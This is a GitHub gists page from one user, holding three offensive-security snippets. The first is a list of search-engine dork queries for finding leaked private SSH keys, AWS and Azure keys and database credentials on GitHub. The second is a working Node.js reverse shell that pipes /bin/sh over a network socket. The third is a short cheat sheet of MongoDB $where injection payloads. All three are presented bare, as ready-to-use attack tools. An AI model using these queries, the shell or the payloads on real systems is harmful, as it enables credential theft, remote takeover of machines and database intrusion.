Skip to content

Instantly share code, notes, and snippets.

View trickycdm's full-sized avatar

Col Mack trickycdm

3 followers · 0 following
View GitHub Profile
@trickycdm
trickycdm / repo-snooping.md
Created July 4, 2017 20:32
Repo Snooping 
inurl:“known_hosts”“ssh-rsa” 
Private encryption keys = site:github.com inurl:“id_rsa” -inurl:“pub” 
Test configuration info = site:github.com inurl:“test” filetype:config 
Ruby on Rails secure token = site:github.com inurl:secret_token.rb 
Windows Azure account keys = site:github.com “;AccountKey=” filetype:config 
Database connection config = site:github.com “;User Id=” filetype:config 
Amazon Web Service access key (Java) = site:github.com “AWS_ACCESS_KEY_ID” filetype:properties 
Amazon Web Service access key (Other) = site:github.com “AWS_ACCESS_KEY_ID” filetype:config
@trickycdm
trickycdm / node-reverse-shell.js
Created July 4, 2017 20:31
Node Reverse Shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "127.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
@trickycdm
trickycdm / mongodb-injection-cheatsheet.md
Last active July 4, 2017 20:30
Mongo Injection Cheatsheet

true, $where: '1 == 1'

, $where: '1 == 1'

$where: '1 == 1'

', $where: '1 == 1'

1, $where: '1 == 1'